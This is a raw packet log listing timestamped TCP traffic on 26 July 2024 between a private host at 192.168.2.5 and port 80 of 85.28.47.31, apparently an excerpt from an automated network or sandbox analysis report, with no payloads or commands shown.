Jul 26, 2024 20:09:11.221594095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221610069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221621037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221646070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.222309113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222321033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222328901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222337961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222353935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222362041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.222364902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222376108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222387075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.222388983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.222398043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.222415924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.222436905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234236956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234334946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234352112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234360933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234401941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234431028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234438896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234450102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234472036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234503031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234647989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234658003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234668016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234678030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234694004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234708071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234766960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.234966040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234975100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234985113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.234994888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235004902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235013962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235023022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235028028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235032082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235069990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235069990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235486984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235496044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235505104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235515118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235524893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235533953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235543966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235553026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235554934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235562086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.235595942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235595942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235596895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.235616922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308186054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308204889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308229923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308247089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308263063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308293104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308320045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308320045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308356047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308371067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308384895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308402061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308410883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308417082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308438063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308458090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308602095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308619022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308644056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308669090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308861017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308882952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308900118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308907986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308913946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308922052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308929920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308939934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308944941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308962107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.308962107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308968067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.308986902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309004068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309199095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309214115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309228897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309242010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309247971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309264898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309268951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309279919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309293985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309297085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309309006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309320927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309324980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309340000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309348106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309356928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309361935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309389114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309397936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309904099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309919119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309933901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309947014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.309956074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309967995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.309997082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310206890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310223103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310245037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310256004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310259104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310267925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310275078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310280085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310290098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310297966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310303926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310318947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310322046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310333967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310333967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310345888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310348034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310360909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310364008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310378075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310379982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310391903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310396910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310408115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.310415030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310432911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.310455084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311243057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311259031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311273098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311286926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311295986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311301947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311306000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311316013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311330080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311332941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311346054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311357021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311359882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311374903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311387062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311389923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311399937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311404943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311419010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311428070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311434984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311450958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.311456919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311471939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.311492920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312155008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312171936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312186003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312201023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312206030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312216043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312218904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312231064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312233925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312244892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312257051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312259912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312273979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312283039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312288046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312303066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312311888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312319040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312335014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312344074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312350035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312354088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312392950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.312964916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312980890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.312994957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.313009977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.313024998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.313035965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.313035965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.313040972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.313060999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.313081980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.324894905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.324934006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.324949026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.324958086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.324985981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325092077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325108051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325123072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325136900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325138092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325145006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325172901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325221062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325330019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325386047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325404882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325419903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325469017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325469017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325573921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325588942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325603008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325618982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325625896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325640917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325664997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325823069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325838089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325853109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325865984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.325875044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325885057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325903893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.325916052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326117039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326132059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326145887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326162100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326164007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326176882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326188087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326191902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326203108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326208115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326221943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326231956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326237917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326250076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326281071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.326591969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.326641083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.399600983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.399662971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.399969101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400021076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400021076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400036097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400074005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400088072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400201082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400216103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400230885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400240898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400255919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400274992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400338888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400384903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400445938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400460958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400475979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400490999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400506020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400515079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400516987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400531054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400554895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400567055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400759935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400775909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400789976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400799036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400804043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400827885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400847912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400857925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400873899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400887966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400897980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400902987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400909901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400918007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400926113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400933027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400942087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400947094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.400958061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400975943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.400985956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401662111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401676893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401690960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401701927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401705980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401715994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401721954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401735067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401736975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401747942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401751995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401761055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401767015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401777983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401782036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401793003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401797056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401808023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401812077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401827097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401829004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401839018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401844025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401855946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401871920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401902914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.401932001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.401947975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402606964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402623892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402645111 CEST	80	49704	85.28.47.31	192.168.2.5
